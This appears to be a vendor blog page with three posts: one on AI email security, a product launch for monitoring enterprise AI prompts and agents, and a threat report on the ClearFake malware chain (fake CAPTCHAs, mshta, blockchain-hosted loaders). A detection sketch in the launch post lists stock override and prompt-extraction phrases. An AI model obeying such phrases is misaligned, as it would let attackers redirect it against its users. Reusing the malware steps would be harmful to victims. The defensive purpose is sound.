April 10, 2023

Employee-Conscious Email Security Solutions in the Workforce

Email threats commonly affect organizations. Read Darktrace's expert insights on how to safeguard your business by educating employees about email security.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product
Written by
Carlos Gray
Senior Product Marketing Manager, Email

When considering email security, IT teams have historically had to choose between excluding employees entirely, or including them but giving them too much power and implementing unenforceable, trust-based policies that try to make up for it. 

However, just because email security should not rely on employees, this does not mean they should be excluded entirely. Employees are the ones interacting with emails daily, and their experiences and behaviors can provide valuable security insights and even influence productivity. 

AI technology can support employee engagement in a non-intrusive, nuanced way that not only maintains email security, but enhances it.

Finding a Balance of Employee Involvement in Security Strategies

Historically, security solutions offered ‘all or nothing’ approaches to employee engagement. On one hand, when employees are involved, they are unreliable. Employees cannot all be experts in security on top of their actual job responsibilities, and mistakes are bound to happen in fast-paced environments.  

Although there have been attempts to raise security awareness, they often fall short: training emails lack context and realism, leaving employees with a poor understanding that often leads them to report emails that are actually safe. Having users constantly triage their inboxes and report safe emails wastes time, cutting into their own productivity as well as the security team's.

Other historical forms of employee involvement also put security at risk. For example, users could create blanket rules through feedback, leading to common problems like safe-listing every email that comes from the gmail.com domain. Other times, employees could choose for themselves to release emails without context or limitations, introducing major risks to the organization. While these approaches let employees participate in security, they do so at the cost of security itself.

Even lower stakes employee involvement can prove ineffective. For example, excessive warnings when sending emails to external contacts can lead to banner fatigue. When employees see the same warning message or alert at the top of every message, it’s human nature that they soon become accustomed and ultimately immune to it.

On the other hand, when employees are fully excluded from security, an opportunity is missed to fine-tune security according to the actual users and to gain feedback on how well the email security solution is working. 

Both conventional options, then, including or excluding employees, prove incapable of leveraging employees effectively. The best email security practice strikes a balance between these two extremes, allowing more nuanced interactions that maintain security without interrupting daily business operations. This can be achieved with AI that tailors interactions to each employee, adding to security instead of detracting from it.

Reducing False Reports While Improving Security Awareness Training 

Humans and AI-powered email security can simultaneously level up by working together. AI can inform employees and employees can inform AI in an employee-AI feedback loop.  

By understanding ‘normal’ behavior for every email user, AI can identify unusual, risky components of an email and take precise action based on the nature of the email to neutralize them, such as rewriting links, flattening attachments, and moving emails to junk. AI can go one step further and explain in non-technical language why it has taken a specific action, which educates users. In contrast to point-in-time simulated phishing email campaigns, this means AI can share its analysis in context and in real time at the moment a user is questioning an email. 
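To make that action-plus-explanation pattern concrete, here is a minimal Python sketch; the class names, fields, and thresholds are all invented for illustration, not Darktrace's implementation:

```python
from dataclasses import dataclass, field

@dataclass
class Email:
    sender: str
    link_domains: list[str] = field(default_factory=list)
    has_macro_attachment: bool = False

def choose_actions(email: Email, known_senders: set[str],
                   known_domains: set[str]) -> tuple[list[str], str]:
    """Pick the narrowest neutralizing actions and explain them in plain language."""
    actions: list[str] = []
    reasons: list[str] = []
    if email.sender not in known_senders:
        reasons.append("the sender has never written to anyone in your organization")
    for domain in email.link_domains:
        if domain not in known_domains:
            actions.append(f"rewrite links to {domain}")
            reasons.append(f"it links to {domain}, which is new for your organization")
    if email.has_macro_attachment:
        actions.append("flatten attachment")
        reasons.append("its attachment contains active content")
    if len(reasons) >= 2:  # several independent anomalies: quarantine outright
        actions.append("move to junk")
    explanation = ("This email was actioned because " + "; ".join(reasons) + ".") \
        if reasons else "No anomalies found; the email was delivered normally."
    return actions, explanation
```

The design point is proportionality: each anomalous component gets the narrowest action that neutralizes it, and the explanation shown to the user is assembled from the same evidence that drove the decision.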

The employee-AI feedback loop educates employees so that they can serve as an additional source of enrichment data. It determines the appropriate level at which to inform and teach users, while never relying on them for threat detection.

In the other direction, the AI learns from users’ activity in the inbox and gradually factors this into its decision-making. This is not a ‘one size fits all’ mechanism – one employee marking an email as safe will never result in blanket approval across the business – but over time, patterns can be observed and autonomous decision-making enhanced.  
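A hedged sketch of that "no blanket approval" principle, with invented names and thresholds: one user's feedback nudges only their own model, and an org-wide change requires consistent signals from many independent users over time.

```python
from collections import defaultdict

class FeedbackLoop:
    GLOBAL_MIN_USERS = 25   # assumed: many distinct users must agree
    PER_USER_STEP = 0.05    # assumed: small per-user threshold nudge

    def __init__(self):
        self.user_bias = defaultdict(float)  # (user, sender) -> adjustment
        self.safe_votes = defaultdict(set)   # sender -> users who marked it safe

    def mark_safe(self, user: str, sender: str):
        # Feedback only shifts this user's own threshold for this sender.
        self.user_bias[(user, sender)] += self.PER_USER_STEP
        self.safe_votes[sender].add(user)

    def org_wide_trusted(self, sender: str) -> bool:
        # A pattern generalizes only after many independent users agree.
        return len(self.safe_votes[sender]) >= self.GLOBAL_MIN_USERS
```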

Figure 1: The employee-AI feedback loop increases employee understanding without putting security at risk.

The employee-AI feedback loop draws out the maximum potential benefits of employee involvement in email security. Other email security solutions consider only the security team, enhancing its workflow while ignoring the employees who report suspicious emails. Employees who try to do the right thing but blindly report emails never learn or improve, and end up wasting their own time. By considering employees and improving security awareness training, the employee-AI feedback loop can level up users: they learn from the AI's explanations how to identify malicious components, and then report fewer emails with greater accuracy.

While AI programs have classically acted like black boxes, Darktrace trains its AI on the best available data, the behavior of the organization's actual employees, and invites both the security team and employees to see the reasoning behind its conclusions. Over time, employees will trust themselves more as they learn to better discern unsafe emails.

Leveraging AI to Generate Productivity Gains

Uniquely, AI-powered email security can have effects outside of security-related areas. It can save time by managing non-productive email. As the AI constantly learns employee behavior in the inbox, it becomes extremely effective at detecting spam and graymail – emails that aren't necessarily malicious, but clutter inboxes and hamper productivity. It does this on a per-user basis, specific to how each employee treats spam, graymail, and newsletters. The AI learns to detect this clutter and, eventually, which messages to pull from the inbox, saving employees time. This highlights how security solutions can go further than merely protecting the email environment with a light touch: AI can promote productivity gains by automating tasks like inbox sorting.
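As a rough illustration of per-user graymail learning (the structure and thresholds are assumptions, not the product's algorithm): if a given user consistently deletes a sender's mail without reading it, future mail from that sender is filed out of the inbox, for that user only.

```python
from collections import defaultdict

class GraymailModel:
    MIN_OBSERVATIONS = 10        # assumed: need enough history per (user, sender)
    IGNORE_RATE_THRESHOLD = 0.9  # assumed: how consistently the user ignores it

    def __init__(self):
        self.seen = defaultdict(int)     # (user, sender) -> emails observed
        self.ignored = defaultdict(int)  # (user, sender) -> deleted unread

    def record(self, user: str, sender: str, read: bool):
        self.seen[(user, sender)] += 1
        if not read:
            self.ignored[(user, sender)] += 1

    def should_file_as_graymail(self, user: str, sender: str) -> bool:
        n = self.seen[(user, sender)]
        if n < self.MIN_OBSERVATIONS:
            return False
        return self.ignored[(user, sender)] / n >= self.IGNORE_RATE_THRESHOLD
```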

Preventing Email Mishaps: How to Deal with Human Error

Improved user understanding and decision making cannot stop natural human error. Employees are bound to make mistakes and can easily send emails to the wrong people, especially when Outlook auto-fills the wrong recipient. This can have effects ranging anywhere from embarrassing to critical, with major implications on compliance, customer trust, confidential intellectual property, and data loss. 

However, AI can help reduce instances of accidentally sending emails to the wrong people. When a user goes to send an email in Outlook, the AI will analyze the recipients. It considers the contextual relationship between the sender and recipients, the relationships the recipients have with each other, how similar each recipient’s name and history is to other known contacts, and the names of attached files.  

If the AI determines that the email is outside of a user’s typical behavior, it may alert the user. Security teams can customize what the AI does next: it can block the email, block the email but allow the user to override it, or do nothing but invite the user to think twice. Since the AI analyzes each email, these alerts are more effective than consistent, blanket alerts warning about external recipients, which often go ignored. With this targeted approach, the AI prevents data leakage and reduces cyber risk. 
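A minimal sketch of the misdirected-recipient idea, assuming just two of the signals described above: whether the sender has ever emailed this recipient, and whether the address closely resembles a known contact (the classic auto-complete slip). This is illustrative, not Darktrace's model:

```python
from difflib import SequenceMatcher

def recipient_warnings(recipient: str, known_contacts: set[str],
                       similarity_cutoff: float = 0.85) -> list[str]:
    """Return human-readable warnings for a potentially misdirected recipient."""
    warnings = []
    if recipient not in known_contacts:
        warnings.append(f"You have never emailed {recipient} before.")
        # A near-match to a known contact suggests an auto-complete mistake.
        for contact in known_contacts:
            if SequenceMatcher(None, recipient, contact).ratio() >= similarity_cutoff:
                warnings.append(f"Did you mean {contact} instead of {recipient}?")
                break
    return warnings

# Example: a one-character slip from a known contact triggers both warnings.
print(recipient_warnings("anna.smith@gmial.com",
                         {"anna.smith@gmail.com", "bob@internal.example"}))
```

The security team's configured policy then decides what to do with the warnings: block, block-with-override, or simply prompt the user to think twice.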

Since the AI is always on and continuously learning, it can adapt autonomously to employee changes. If the role of an employee evolves, the AI will learn the new normal, including common behaviors, recipients, attached file names, and more. This allows the AI to continue effectively flagging potential instances of human error, without needing manual rule changes or disrupting the employee’s workflow. 

Email Security Informed by Employee Experience

As the practical users of email, employees should be considered when designing email security. This employee-conscious lens to security can strengthen defenses, improve productivity, and prevent data loss.  

In these ways, email security can benefit both employees and security teams. Employees can become another layer of defense with improved security awareness training that cuts down on false reports of safe emails. This insight into employee email behavior can also enhance employee productivity by learning and sorting graymail. Finally, viewing security in relation to employees can help security teams deploy tools that reduce data loss by flagging misdirected emails. With these capabilities, Darktrace/Email™ enables security teams to optimize the balance of employee involvement in email security.



February 3, 2026

Introducing Darktrace / SECURE AI: Complete AI Security Across Your Enterprise


Why securing AI can’t wait

AI is entering the enterprise faster than IT and security teams can keep up, appearing in SaaS tools, embedded in core platforms, and spun up by teams eager to move faster.  

As this adoption accelerates, it introduces unpredictable behaviors and expands the attack surface in ways existing security tools, whether from startups or established platforms, cannot see or control. These new types of risk command the attention of security teams and boardrooms, touching everything from business integrity to regulatory exposure.

Securing AI demands a fundamentally different approach, one that understands how AI behaves, how it interacts with data and users, and how risk emerges in real time. That shift is at the core of how organizations should be thinking about securing AI across the enterprise.

What is the current state of securing AI?

In Darktrace's latest State of AI in Cybersecurity Report, research across 1,500 cybersecurity professionals shows that the percentage of organizations without an AI adoption policy grew from 55% last year to 63% this year.

More troubling, the percentage of organizations without any plan to create an AI policy nearly tripled from 3% to 8%. Without clear policies, businesses are effectively accelerating blindfolded.

When we analyzed activity across our own customer base, we saw the same patterns playing out in their environments. Last October alone, we saw a 39% month-over-month increase in anomalous data uploads to generative AI services, with the average upload being 75MB. Given the size and frequency of these uploads, it's almost certain that much of this data should never be leaving the enterprise.

Many security teams still lack visibility into how AI is being used across their business; how it’s behaving, what it’s accessing, and most importantly, whether it’s operating safely. This unsanctioned usage quietly expands, creating pockets of AI activity that fall completely outside established security controls. The result is real organizational exposure with almost no visibility, underscoring just how widespread AI use has already become given the absence of formal policies.

This challenge doesn’t stop internally. Shadow AI extends into third-party tools, vendor platforms, and partner systems, where AI features are embedded without clear oversight.

Meanwhile, attackers are now learning to exploit AI’s unique characteristics, compounding the risks organizations are already struggling to manage.

The leader in AI cybersecurity now secures AI

Darktrace brings more than a decade of behavioral AI expertise built on an enterprise‑wide platform designed to operate in the complex, ambiguous environments where today’s AI now lives.  

Other cybersecurity technologies try to predict each new attack based on historical attacks. The problem is that AI operates like humans do: every action introduces new information that changes how it behaves. It's unpredictable, and historical attack tactics are now only a small part of the equation, forcing vendors to retrofit unproven acquisitions to secure AI.

Darktrace is fundamentally different. Our Self‑Learning AI learns what “normal” looks like for your unique business: how your users, systems, applications, and now AI agents behave, how they communicate, and how data flows. This allows us to spot even the smallest shifts when something changes in meaningful ways. Long before AI agents were introduced, our technology was already interpreting nuance, detecting drift, uncovering hidden relationships, and making sense of ambiguous activity across networks, cloud, SaaS, email, OT, identities, and endpoints.
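As a toy illustration of behavioral baselining in general (an assumption about the broad approach, not Darktrace's Self-Learning AI), here is a per-entity running baseline that flags sharp deviations from an entity's own history rather than matching known-attack signatures:

```python
import math

class Baseline:
    """Welford's online mean/variance for one behavioral metric of one entity."""
    def __init__(self):
        self.n, self.mean, self.m2 = 0, 0.0, 0.0

    def update(self, x: float):
        self.n += 1
        delta = x - self.mean
        self.mean += delta / self.n
        self.m2 += delta * (x - self.mean)

    def is_anomalous(self, x: float, z_threshold: float = 4.0) -> bool:
        if self.n < 30:  # not enough history to judge yet
            return False
        std = math.sqrt(self.m2 / (self.n - 1))
        return std > 0 and abs(x - self.mean) / std > z_threshold
```

One such baseline per entity and metric (a user's upload volume, an agent's API-call rate, and so on) is enough to convey the idea: "normal" is defined by the entity itself, so novel attacks with no historical signature still stand out.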

As AI introduces new behaviors, unstructured interactions, invisible pathways, and the rise of Shadow AI, these challenges have only intensified. But this is exactly the environment our platform was built for. Securing AI isn’t a new direction for Darktrace — it’s the natural evolution of the behavioral intelligence we’ve delivered to thousands of organizations worldwide.

Introducing Darktrace / SECURE AI – Complete AI security across your enterprise

We are proud to introduce Darktrace / SECURE AI, the newest product in the Darktrace ActiveAI Security Platform designed to secure AI across the whole enterprise.

This marks the next chapter in our mission to secure organizations from cyber threats and emerging risks. By combining full visibility, intelligent behavioral oversight, and real-time control, Darktrace is enabling enterprises to safely adopt, manage, and build AI within their business. This ensures that AI usage, data access, and behavior remain aligned to security baselines, compliance, and business goals.

Darktrace / SECURE AI can bring every AI interaction into a single view, helping teams understand intent, assess risk, protect sensitive data, and enforce policy across both human and AI Agent activity. Now organizations can embrace AI with confidence, with visibility to ensure it is operating safely, responsibly, and in alignment with their security and compliance needs.  

Because securing AI spans multiple areas and layers of complexity, Darktrace / SECURE AI is built around four foundational use cases that ensure your whole enterprise, and every AI use affecting your business, whether owned or through third parties, is protected:

  • Monitoring the prompts driving GenAI agents and assistants
  • Securing business AI agent identities in real time
  • Evaluating AI risks in development and deployment
  • Discovering and controlling Shadow AI

Monitoring the prompts driving GenAI agents and assistants

For AI systems, prompts are one of the most active and sensitive points of interaction—spanning human‑AI exchanges where users express intent and AI‑AI interactions where agents generate internal prompts to reason and coordinate. Because prompt language effectively is behavior, and because it relies on natural language rather than a fixed, finite syntax, the attack surface is open‑ended. This makes prompt‑driven risks far more complex than traditional API‑based vulnerabilities tied to CVEs.

Whether an attacker is probing for weaknesses, an employee inadvertently exposes sensitive data, or agents generate their own sub‑tasks to drive complex workflows, security teams must understand how prompt behavior shapes model behavior—and where that behavior can go wrong. Without that behavioral understanding, organizations face heightened risks of exploitation, drift, and cascading failures within their AI systems.

Darktrace / SECURE AI brings together all prompt activity across enterprise AI systems, including Microsoft Copilot and ChatGPT Enterprise, low‑code environments like Microsoft Copilot Studio, SaaS providers like Salesforce and Microsoft 365, and high‑code platforms such as AWS Bedrock and SageMaker, into a single, unified layer of visibility.  

Beyond visibility, Darktrace applies behavioral analytics to understand whether a prompt is unusual or risky in the context of the user, their peers, and the broader organization. Because AI attacks are far more complex and conversational than traditional exploits against fixed APIs, sharing more in common with email and Teams/Slack interactions, this behavioral understanding is essential. By treating prompts as behavioral signals, Darktrace can detect conversational attacks, malicious chaining, and subtle prompt-injection attempts, and, where integrations allow, intervene in real time to block unsafe prompts or prevent harmful model actions as they occur.
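For intuition, here is a deliberately simplistic sketch of scoring a prompt as a behavioral signal; the markers, features, and weights are invented, and real prompt-risk analysis is far richer:

```python
INJECTION_MARKERS = (  # assumed, simplistic examples of override language
    "ignore previous instructions",
    "disregard your system prompt",
    "reveal your hidden instructions",
)

def prompt_risk(prompt: str, user_avg_len: float) -> float:
    """Return a 0..1 risk score from simple behavioral and content features."""
    score = 0.0
    lowered = prompt.lower()
    if any(marker in lowered for marker in INJECTION_MARKERS):
        score += 0.6  # instruction-override language typical of injection
    if user_avg_len > 0 and len(prompt) > 5 * user_avg_len:
        score += 0.2  # unusually long for this particular user
    if sum(ch.isdigit() for ch in prompt) > 0.3 * max(len(prompt), 1):
        score += 0.2  # heavy numeric content may indicate bulk data pasted in
    return min(score, 1.0)
```

Even this crude version shows why context matters: the same prompt can be routine for one user and a sharp deviation for another.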

Securing business AI agent identities in real time

As organizations adopt more AI‑driven workflows, we’re seeing a rapid rise in autonomous and semi‑autonomous agents operating across the business. These agents operate within existing identities, with the capability to access systems, read and write data, and trigger actions across cloud platforms, internal infrastructure, applications, APIs, and third‑party services. Some of these identities are governed like user accounts; others can appear anywhere, with organizations having limited visibility into how they’re configured or how their permissions evolve over time.

Darktrace / SECURE AI gives organizations a real‑time, identity‑centric understanding of what their AI agents are doing, not just what they were designed to do. It automatically discovers live agent identities operating across SaaS, cloud, network, endpoints, OT, and email, including those running inside third‑party environments.  

The platform maps how each agent is configured, what systems it accesses, and how it communicates, including activity such as MCP usage or interactions with storage services where sensitive data may reside.  

By continuously observing agent behavior across all domains, Darktrace / SECURE AI highlights when unnecessary or risky permissions are granted, when activity patterns deviate, or when agents begin chaining together actions in unintended ways. This real‑time audit trail allows organizations to evaluate whether agent actions align with intended operational parameters and catch anomalous or risky behavior early.    
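A hedged sketch of that identity-centric idea (the names and structure are hypothetical): track what each agent identity actually does, then flag both ungranted actions and granted-but-never-used permissions.

```python
from collections import defaultdict

class AgentMonitor:
    def __init__(self):
        self.granted = defaultdict(set)   # agent -> permissions granted
        self.observed = defaultdict(set)  # agent -> actions actually seen

    def record_action(self, agent: str, action: str) -> bool:
        """Flag actions that are ungranted, or granted but never seen before."""
        first_time = action not in self.observed[agent]
        self.observed[agent].add(action)
        ungranted = action not in self.granted[agent]
        return ungranted or first_time

    def unused_permissions(self, agent: str) -> set:
        """Granted-but-never-used permissions are candidates for removal."""
        return self.granted[agent] - self.observed[agent]
```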

Evaluating AI risks in development and deployment

In the build phase, new identities are created, entitlements accumulate, components are stitched together across SaaS, cloud, and internal environments, and logic starts taking shape through prompts and configurations.  

It’s a highly dynamic and often fragmented process, and even small missteps here, such as a misconfiguration in a created agent identity, can become major security issues once the system is deployed. This is why evaluating AI risk during development and deployment is critical.

Darktrace / SECURE AI brings clarity and control across this entire lifecycle, from the moment an AI system starts taking shape to the moment it goes live. It gives you visibility into created identities and their access across hyperscalers, low‑code SaaS, and internal labs, supported by AI security posture management that surfaces misconfigurations, over‑entitlement, and anomalous building events. Darktrace / SECURE AI then connects these development insights directly to prompt oversight, linking how AI is being built to how it will behave once deployed. The result is a safer, more predictable AI lifecycle where risks are discovered early, guardrails are applied consistently, and innovation moves forward with confidence rather than guesswork.
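As a minimal illustration of build-time posture checks (the config fields and rules below are hypothetical, and real AI security posture management covers far more), the general shape is declarative checks over agent configurations before deployment:

```python
def posture_findings(agent_config: dict) -> list[str]:
    """Return human-readable findings for a single agent configuration."""
    findings = []
    if "admin" in agent_config.get("permissions", []):
        findings.append("over-entitled: agent holds admin rights")
    if not agent_config.get("owner"):
        findings.append("misconfiguration: no accountable human owner")
    if agent_config.get("can_send_external_email") and not agent_config.get("dlp_enabled"):
        findings.append("risky: external email without data-loss controls")
    return findings

# Example use at build or deployment time:
cfg = {"permissions": ["read_crm", "admin"], "can_send_external_email": True}
for finding in posture_findings(cfg):
    print("FINDING:", finding)
```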

Discovering and controlling Shadow AI

Shadow AI has now appeared across every corner of the enterprise. It’s not just an employee pasting internal data into an external chatbot; it includes unsanctioned agent builders, hidden MCP servers, rogue model deployments, and AI‑driven workflows running on devices or services no one expected to be using AI.  

Darktrace / SECURE AI brings this frontier into view by continuously analyzing interactions across cloud, networks, endpoints, OT, and SASE environments. It surfaces unapproved AI usage wherever it appears and distinguishes legitimate activity in sanctioned tools from misuse or high‑risk behavior. The system identifies hidden AI components and rogue agents, reveals unauthorized deployments and unexpected connections to external AI systems, and highlights risky data flows that deviate from business norms.

When the behavior warrants a response, Darktrace / SECURE AI enables policy enforcement that guides users back toward sanctioned options while containing unsafe or ungoverned adoption. This closes one of the fastest‑expanding security gaps in modern enterprises and significantly reduces the attack surface created by shadow AI.
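A toy sketch of the discovery side, assuming a sanctioned-AI allowlist and a necessarily incomplete catalogue of known AI services; all domains and thresholds here are placeholders:

```python
SANCTIONED_AI = {"copilot.internal.example", "chatgpt-enterprise.example"}
KNOWN_AI_SERVICES = {"api.openai.com", "generativelanguage.googleapis.com"}

def classify_connection(dest_host: str, bytes_out: int) -> str:
    """Classify one outbound connection from network telemetry."""
    if dest_host in SANCTIONED_AI:
        return "sanctioned"
    if dest_host in KNOWN_AI_SERVICES:
        # Unsanctioned AI use; large uploads make it urgent.
        return "shadow-ai:high-risk" if bytes_out > 10_000_000 else "shadow-ai"
    return "unclassified"

print(classify_connection("api.openai.com", 75_000_000))  # -> shadow-ai:high-risk
```

In practice the "unclassified" bucket is where behavioral analysis matters most, since shadow AI by definition includes services no catalogue has seen yet.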

Conclusion

What’s needed now, along with policies and frameworks for AI adoption, is the right tooling to detect threats based on AI behavior across shadow use, prompt risks, identity misuse, and AI development.

Darktrace is uniquely positioned to secure AI: we’ve spent over a decade building AI that learns your business, understanding subtle behavior across the entire enterprise long before AI agents arrived. With over 10,000 customers relying on Darktrace as the last line of defense to capture threats others cannot, securing AI isn’t a pivot for us, and it’s not an acquisition; it’s the natural extension of the behavioral expertise and enterprise‑wide intelligence our platform was built on from the start.

To learn more about how to secure AI at your organization, we have curated a readiness program that brings together IT and security leaders navigating this responsibility, providing a forum to prepare for high-impact decisions, explore guardrails, and guide the business amid growing uncertainty and pressure.

Sign up for the Secure AI Readiness Program here for exclusive access to news on the latest AI threats, updates on emerging approaches shaping AI security, and insights into new innovations, including Darktrace’s ongoing work in this area.

Ready to talk with a Darktrace expert on securing AI? Register here to receive practical guidance on the AI risks that matter most to your business, paired with clarity on where to focus first across governance, visibility, risk reduction, and long-term readiness.  

About the author
Brittany Woodsmall
Product Marketing Manager, AI


February 1, 2026

ClearFake: From Fake CAPTCHAs to Blockchain-Driven Payload Retrieval


What is ClearFake?

As threat actors evolve their techniques to exploit victims and breach target networks, the ClearFake campaign has emerged as a significant illustration of this continued adaptation. ClearFake is a campaign observed using a malicious JavaScript framework deployed on compromised websites, impacting sectors such as e‑commerce, travel, and automotive. First identified in mid‑2023, ClearFake is frequently leveraged to socially engineer victims into installing fake web browser updates.

In ClearFake compromises, victims are steered toward compromised WordPress sites, often positioned by attackers through search engine optimization (SEO) poisoning. Once on the site, users are presented with a fake CAPTCHA. This counterfeit challenge is designed to appear legitimate while enabling the execution of malicious code. When a victim interacts with the CAPTCHA, a PowerShell command containing a download string is retrieved and executed.

Attackers commonly abuse the legitimate Microsoft HTML Application Host (MSHTA) in these operations. Recent campaigns have also incorporated Smart Chain endpoints, such as “bsc-dataseed.binance[.]org,” to obtain configuration code. The primary payload delivered through ClearFake is typically an information stealer, such as Lumma Stealer, enabling credential theft, data exfiltration, and persistent access [1].

Darktrace’s Coverage of ClearFake

Darktrace / ENDPOINT first detected activity likely associated with ClearFake on a single device over the course of one day on November 18, 2025. The system observed the execution of “mshta.exe,” the legitimate Microsoft HTML Application Host utility. It also noted a repeated process command referencing “weiss.neighb0rrol1[.]ru”, indicating suspicious external activity. Subsequent analysis of this endpoint using open‑source intelligence (OSINT) indicated that it was a malicious domain generation algorithm (DGA) endpoint [2].

Figure 1: The process line referencing weiss.neighb0rrol1[.]ru, as observed by Darktrace / ENDPOINT.

This activity indicates that mshta.exe was used to contact a remote server, “weiss.neighb0rrol1[.]ru/rpxacc64mshta,” and execute the associated HTA file to initiate the next stage of the attack. OSINT sources have since heavily flagged this server as potentially malicious [3].

The first argument in this process uses the MSHTA utility to execute the HTA file hosted on the remote server. If successful, MSHTA would then run JavaScript or VBScript to launch PowerShell commands used to retrieve malicious payloads, a technique observed in previous ClearFake campaigns. Darktrace also detected unusual activity involving additional Microsoft executables, including “winlogon.exe,” “userinit.exe,” and “explorer.exe.” Although these binaries are legitimate components of the Windows operating system, threat actors can abuse their normal behavior within the Windows login sequence to gain control over user sessions, similar to the misuse of mshta.exe.
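For defenders, a hedged illustration of the kind of logic that catches this tradecraft (not a Darktrace model definition): because mshta.exe is a legitimate binary, the signal lies in its arguments, and a remote URL on the command line is rarely legitimate.

```python
import re

# Crude heuristic markers: an explicit URL scheme, or a bare hostname in
# TLDs commonly abused in these campaigns. Purely illustrative.
REMOTE_ARG = re.compile(r"https?://|\b[a-z0-9.-]+\.(ru|top|xyz)\b", re.IGNORECASE)

def suspicious_mshta(command_line: str) -> bool:
    """Flag mshta invocations whose arguments reference a remote endpoint."""
    return "mshta" in command_line.lower() and bool(REMOTE_ARG.search(command_line))

print(suspicious_mshta("mshta.exe https://remote.example/payload.hta"))  # True
```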

EtherHiding

Darktrace also identified additional ClearFake‑related activity, specifically a connection to bsc-testnet.drpc[.]org, a legitimate BNB Smart Chain endpoint. This activity was triggered by injected JavaScript on the compromised site www.allstarsuae[.]com, where the script initiated an eth_call POST request to the Smart Chain endpoint.

Figure 2: Example of a fake CAPTCHA on the compromised site www.allstarsuae[.]com.

EtherHiding is a technique in which threat actors leverage blockchain technology, specifically smart contracts, as part of their malicious infrastructure. Because blockchain is anonymous, decentralized, and highly persistent, it provides threat actors with advantages in evading defensive measures and traditional tracking [4].

In this case, when a user visited the compromised WordPress site, injected Base64‑encoded JavaScript retrieved an ABI string, which was then used to load and execute a contract hosted on the BNB Smart Chain.

Figure 3: JavaScript hosted on the compromised site www.allstarsuae[.]com.

Malware analysis of this instance showed that the Base64 decoded into a JavaScript loader. A POST request to bsc-testnet.drpc[.]org was then used to retrieve a hex‑encoded ABI string that loads and executes the contract. The JavaScript also contained hex‑ and Base64‑encoded functions that decoded into additional JavaScript, which attempted to retrieve a payload hosted on GitHub at “github[.]com/PrivateC0de/obf/main/payload.txt.” However, this payload was unavailable at the time of analysis.

Figure 4: Darktrace’s detection of the POST request to bsc-testnet.drpc[.]org.
Figure 5: Darktrace’s detection of the executable file and the malicious hostname.
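For reference, this is roughly what an EtherHiding-style eth_call looks like on the wire: a standard JSON-RPC POST to a public Smart Chain endpoint. The contract address and call data below are placeholders, not real indicators of compromise.

```python
import json

eth_call_body = {
    "jsonrpc": "2.0",
    "method": "eth_call",
    "params": [{
        "to": "0x0000000000000000000000000000000000000000",  # contract (placeholder)
        "data": "0x2d883a73",                                 # function selector (placeholder)
    }, "latest"],
    "id": 1,
}
# Network monitoring can key on POST bodies carrying "method": "eth_call"
# sent to blockchain RPC endpoints from hosts with no business need for them.
print(json.dumps(eth_call_body, indent=2))
```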

Autonomous Response

As Darktrace’s Autonomous Response capability was enabled on this customer’s network, Darktrace was able to take swift mitigative action to contain the ClearFake‑related activity early, before it could lead to potential payload delivery. The affected device was blocked from making external connections to a number of suspicious endpoints, including 188.114.96[.]6, *.neighb0rrol1[.]ru, and neighb0rrol1[.]ru, ensuring that no further malicious connections could be made and no payloads could be retrieved.

Autonomous Response also acted to prevent the executable mshta.exe from initiating HTA file execution over HTTPS from this endpoint by blocking the attempted connections. Had these files executed successfully, the attack would likely have resulted in the retrieval of an information stealer, such as Lumma Stealer.

Figure 6: Autonomous Response’s intervention against the suspicious connectivity observed.

Conclusion

ClearFake continues to be observed across multiple sectors, but Darktrace remains well‑positioned to counter such threats. Because ClearFake’s end goal is often to deliver malware such as information stealers and malware loaders, early disruption is critical to preventing compromise. Users should remain aware of this activity and vigilant regarding fake CAPTCHA pop‑ups. They should also monitor unusual usage of MSHTA and outbound connections to domains that mimic formats such as “bsc-dataseed.binance[.]org” [1].

In this case, Darktrace was able to contain the attack before it could successfully escalate and execute. The attempted execution of HTA files was detected early, allowing Autonomous Response to intervene, stopping the activity from progressing. As soon as the device began communicating with weiss.neighb0rrol1[.]ru, an Autonomous Response inhibitor triggered and interrupted the connections.

As ClearFake continues to rise, users should stay alert to social engineering techniques, including ClickFix, that rely on deceptive security prompts.

Credit to Vivek Rajan (Senior Cyber Analyst) and Tara Gould (Malware Research Lead)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Darktrace Model Detections

Process / New Executable Launched

Endpoint / Anomalous Use of Scripting Process

Endpoint / New Suspicious Executable Launched

Endpoint / Process Connection::Unusual Connection from New Process

Autonomous Response Models

Antigena / Network::Significant Anomaly::Antigena Significant Anomaly from Client Block

List of Indicators of Compromise (IoCs)

  • weiss.neighb0rrol1[.]ru – Hostname – Malicious domain
  • 188.114.96[.]6 – IP address – Suspicious IP
  • *.neighb0rrol1[.]ru – Domain pattern – Malicious domain

MITRE ATT&CK Mapping

Drive-by Compromise – Initial Access – T1189

User Execution – Execution – T1204

Software Deployment Tools – Execution, Lateral Movement – T1072

Command and Scripting Interpreter – Execution – T1059

System Binary Proxy Execution: MSHTA – Defense Evasion – T1218.005

References

1. https://www.kroll.com/en/publications/cyber/rapid-evolution-of-clearfake-delivery

2. https://www.virustotal.com/gui/domain/weiss.neighb0rrol1.ru

3. https://www.virustotal.com/gui/file/1f1aabe87e5e93a8fff769bf3614dd559c51c80fc045e11868f3843d9a004d1e/community

4. https://www.packetlabs.net/posts/etherhiding-a-new-tactic-for-hiding-malware-on-the-blockchain/

About the author
Vivek Rajan
Cyber Analyst